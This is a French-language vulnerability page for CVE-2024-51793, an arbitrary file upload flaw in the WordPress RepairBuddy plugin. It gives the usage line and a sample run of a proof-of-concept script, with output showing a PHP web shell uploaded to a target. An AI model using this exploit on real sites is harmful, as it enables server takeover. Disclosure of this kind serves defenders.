
Plugin WordPress RepairBuddy <= 3.8115 - Vulnérabilité de téléchargement de fichier arbitraire
CVE-ID: CVE-2024-51793
Publiée: 2024-11-11
Mise à jour: 2024-11-11
Titre: Plugin WordPress RepairBuddy <= 3.8115 - Vulnérabilité de téléchargement de fichier arbitraire
Description:
La vulnérabilité de téléchargement sans restriction de fichier avec un type dangereux dans Webful Creations Computer Repair Shop permet de télécharger un shell web sur un serveur web. Ce problème affecte Computer Repair Shop : de n/a jusqu'à 3.8115.
CWE:
CVSS:
Il s'agit d'un exploit de preuve de concept pour la vulnérabilité de téléchargement de fichier arbitraire dans le plugin WordPress RepairBuddy versions <= 3.8115. L'exploit permet à un attaquant de télécharger un shell web sur le serveur vulnérable.
requests (pip install requests)usage:
CVE-2024-51793.py [-h] -u URL [-shell SHELL]
WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-shell SHELL Shell code to upload
python
CVE-2024-51793.py -u http://target.com/wordpress
Exploit By : Nxploit Khaled Alenazi,
🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
Exploit par : Nxploited, Khaled Alenazi